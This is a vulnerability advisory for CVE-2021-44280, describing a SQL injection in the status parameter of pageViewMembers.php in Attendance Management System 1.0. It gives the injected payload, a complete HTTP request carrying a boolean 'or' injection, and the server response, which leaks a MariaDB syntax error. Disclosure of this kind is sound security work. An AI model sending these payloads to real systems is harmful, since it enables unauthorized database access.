CVE-2021-44280
Vendor
Description:
The status parameter from pageViewMembers.php on Attendance Management System 1.0 appears to be vulnerable to SQL injection attacks from INSIDE. The payload 011011100111010100110001001100010111001101100101011000110111010101110010001100010111010001111001%27or%271=1 was submitted in the status parameter, and a database error message was returned. The attacker can perform different attacks against the system. STATUS: Risk LOW - MEDIUM
SQl Request:
GET /Attendance-Management-System/admin/pageViewMembers.php?status=164054629%20or%204022%3d04022 HTTP/1.1
Host: 192.168.10.22
Cookie: Attendance_Management_System_rememberMe=c0e024d9200b5705bc4804722636378a; Attendance_Management_System=e8oqed0r866tojucn8g7ikd35c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.10.22/Attendance-Management-System/admin/pageHome.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0SQL Response:
HTTP/1.1 200 OK
Date: Mon, 06 Dec 2021 11:49:03 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13970
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html cla
...[SNIP]...
<script>
$j(function(){
show_notification({"message":"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1<pre class=\"ltr\">
...[SNIP]...